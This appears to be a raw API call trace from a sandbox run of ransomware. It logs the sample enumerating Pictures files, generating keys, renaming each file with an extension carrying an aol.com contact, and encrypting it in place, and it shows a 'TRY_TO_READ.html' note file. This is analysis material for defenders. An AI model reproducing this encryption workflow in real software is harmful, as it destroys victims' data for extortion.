	[0107.036] FindNextFileW (in: hFindFile=0x37b0120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63599b0, ftCreationTime.dwHighDateTime=0x1d4c872, ftLastAccessTime.dwLowDateTime=0xe65b85f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe65b85f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.036] FindNextFileW (in: hFindFile=0x37b0120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bda9190, ftCreationTime.dwHighDateTime=0x1d4cbc6, ftLastAccessTime.dwLowDateTime=0x1ee00300, ftLastAccessTime.dwHighDateTime=0x1d4c8ff, ftLastWriteTime.dwLowDateTime=0x1ee00300, ftLastWriteTime.dwHighDateTime=0x1d4c8ff, nFileSizeHigh=0x0, nFileSizeLow=0x1c06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-JrdHFK.gif", cAlternateFileName="")) returned 1
	[0107.036] FindNextFileW (in: hFindFile=0x37b0120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6616d50, ftCreationTime.dwHighDateTime=0x1d4c94a, ftLastAccessTime.dwLowDateTime=0xe27c70f0, ftLastAccessTime.dwHighDateTime=0x1d4cb52, ftLastWriteTime.dwLowDateTime=0xe27c70f0, ftLastWriteTime.dwHighDateTime=0x1d4cb52, nFileSizeHigh=0x0, nFileSizeLow=0x13491, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4mALy0h58uVmOjn.bmp", cAlternateFileName="4MALY0~1.BMP")) returned 1
	[0107.036] FindNextFileW (in: hFindFile=0x37b0120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89de0d60, ftCreationTime.dwHighDateTime=0x1d4cccd, ftLastAccessTime.dwLowDateTime=0x90985700, ftLastAccessTime.dwHighDateTime=0x1d4cf16, ftLastWriteTime.dwLowDateTime=0x90985700, ftLastWriteTime.dwHighDateTime=0x1d4cf16, nFileSizeHigh=0x0, nFileSizeLow=0x6bfa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SDPTwlx.jpg", cAlternateFileName="")) returned 1
	[0107.036] FindNextFileW (in: hFindFile=0x37b0120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe65b85f0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe65b85f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe65b85f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.037] FindNextFileW (in: hFindFile=0x37b0120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9545220, ftCreationTime.dwHighDateTime=0x1d4d24b, ftLastAccessTime.dwLowDateTime=0x21e6c700, ftLastAccessTime.dwHighDateTime=0x1d4cbf7, ftLastWriteTime.dwLowDateTime=0x21e6c700, ftLastWriteTime.dwHighDateTime=0x1d4cbf7, nFileSizeHigh=0x0, nFileSizeLow=0x8719, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XCKJAlV4u.bmp", cAlternateFileName="XCKJAL~1.BMP")) returned 1
	[0107.037] FindNextFileW (in: hFindFile=0x37b0120, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9545220, ftCreationTime.dwHighDateTime=0x1d4d24b, ftLastAccessTime.dwLowDateTime=0x21e6c700, ftLastAccessTime.dwHighDateTime=0x1d4cbf7, ftLastWriteTime.dwLowDateTime=0x21e6c700, ftLastWriteTime.dwHighDateTime=0x1d4cbf7, nFileSizeHigh=0x0, nFileSizeLow=0x8719, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XCKJAlV4u.bmp", cAlternateFileName="XCKJAL~1.BMP")) returned 0
	[0107.037] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.037] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.037] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp", dwFileAttributes=0x80) returned 1
	[0107.037] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp") returned 67
	[0107.037] GetProcessHeap () returned 0x540000
	[0107.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xec) returned 0x56b448
	[0107.037] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp"
	[0107.037] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.037] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\xckjalv4u.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\xckjalv4u.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.040] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\XCKJAlV4u.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\xckjalv4u.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554
	[0107.040] GetProcessHeap () returned 0x540000
	[0107.040] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0107.040] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=34585) returned 1
	[0107.040] SetFilePointer (in: hFile=0x554, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8719
	[0107.040] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.040] GetProcessHeap () returned 0x540000
	[0107.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.040] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.040] WriteFile (in: hFile=0x554, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.042] WriteFile (in: hFile=0x554, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.042] WriteFile (in: hFile=0x554, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.042] ReadFile (in: hFile=0x554, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x8719, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x8719, lpOverlapped=0x0) returned 1
	[0107.043] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.043] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.043] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg", dwFileAttributes=0x80) returned 1
	[0107.043] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg") returned 65
	[0107.043] GetProcessHeap () returned 0x540000
	[0107.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe8) returned 0x597dc8
	[0107.043] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg"
	[0107.043] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.043] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\sdptwlx.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\sdptwlx.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.047] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\SDPTwlx.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\sdptwlx.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554
	[0107.047] GetProcessHeap () returned 0x540000
	[0107.047] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0107.047] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=27642) returned 1
	[0107.047] SetFilePointer (in: hFile=0x554, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x6bfa
	[0107.047] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.047] GetProcessHeap () returned 0x540000
	[0107.047] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.048] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.048] WriteFile (in: hFile=0x554, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.048] WriteFile (in: hFile=0x554, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.049] WriteFile (in: hFile=0x554, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.049] ReadFile (in: hFile=0x554, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x6bfa, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x6bfa, lpOverlapped=0x0) returned 1
	[0107.049] SetFilePointer (in: hFile=0x554, lDistanceToMove=-27642, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0107.049] WriteFile (in: hFile=0x554, lpBuffer=0x37b7c50*, nNumberOfBytesToWrite=0x6bfa, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b7c50*, lpNumberOfBytesWritten=0x3a1f778*=0x6bfa, lpOverlapped=0x0) returned 1
	[0107.049] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.049] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.049] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp", dwFileAttributes=0x80) returned 1
	[0107.049] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp") returned 73
	[0107.049] GetProcessHeap () returned 0x540000
	[0107.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x57fb28
	[0107.050] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp"
	[0107.050] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.050] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\4maly0h58uvmojn.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\4maly0h58uvmojn.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.052] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\4mALy0h58uVmOjn.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\4maly0h58uvmojn.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554
	[0107.052] GetProcessHeap () returned 0x540000
	[0107.052] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.052] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=78993) returned 1
	[0107.052] SetFilePointer (in: hFile=0x554, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x13491
	[0107.052] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.052] GetProcessHeap () returned 0x540000
	[0107.052] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.052] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.052] WriteFile (in: hFile=0x554, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.053] WriteFile (in: hFile=0x554, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.053] WriteFile (in: hFile=0x554, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.054] ReadFile (in: hFile=0x554, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x13491, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x13491, lpOverlapped=0x0) returned 1
	[0107.055] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.055] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.055] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif", dwFileAttributes=0x80) returned 1
	[0107.056] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif") returned 65
	[0107.056] GetProcessHeap () returned 0x540000
	[0107.056] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe8) returned 0x597dc8
	[0107.056] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif"
	[0107.056] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.056] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\-jrdhfk.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\-jrdhfk.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.060] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\-JrdHFK.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\-jrdhfk.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554
	[0107.060] GetProcessHeap () returned 0x540000
	[0107.060] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0107.060] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=7174) returned 1
	[0107.060] SetFilePointer (in: hFile=0x554, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1c06
	[0107.060] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.060] GetProcessHeap () returned 0x540000
	[0107.060] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.060] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.062] WriteFile (in: hFile=0x554, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.063] WriteFile (in: hFile=0x554, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.063] WriteFile (in: hFile=0x554, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.063] ReadFile (in: hFile=0x554, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x1c06, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x1c06, lpOverlapped=0x0) returned 1
	[0107.063] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84d23630, ftCreationTime.dwHighDateTime=0x1d4c696, ftLastAccessTime.dwLowDateTime=0xe65b85f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe65b85f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0160
	[0107.063] FindNextFileW (in: hFindFile=0x37b0160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84d23630, ftCreationTime.dwHighDateTime=0x1d4c696, ftLastAccessTime.dwLowDateTime=0xe65b85f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe65b85f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.063] FindNextFileW (in: hFindFile=0x37b0160, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91a5d40, ftCreationTime.dwHighDateTime=0x1d4d3ae, ftLastAccessTime.dwLowDateTime=0xc0c8e680, ftLastAccessTime.dwHighDateTime=0x1d4c9f1, ftLastWriteTime.dwLowDateTime=0xc0c8e680, ftLastWriteTime.dwHighDateTime=0x1d4c9f1, nFileSizeHigh=0x0, nFileSizeLow=0x5dad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mHP0ZA.gif", cAlternateFileName="")) returned 1
